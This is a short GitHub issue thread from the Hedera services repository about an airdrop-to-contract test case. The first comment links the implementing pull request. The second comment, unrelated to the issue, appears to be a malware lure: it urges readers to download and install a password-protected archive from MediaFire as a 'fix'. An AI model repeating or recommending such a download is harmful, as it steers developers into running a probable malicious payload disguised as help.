### ISSUE TITLE
(AIRDROP_TO_CONTRACT_33) CryptoTransfer to a contract with no Admin key

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15247]

**Comment by vtronkov** [comment]
Implemented in https://github.com/hashgraph/hedera-services/pull/14664 - `airdropToContractWithoutAdminKey`

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
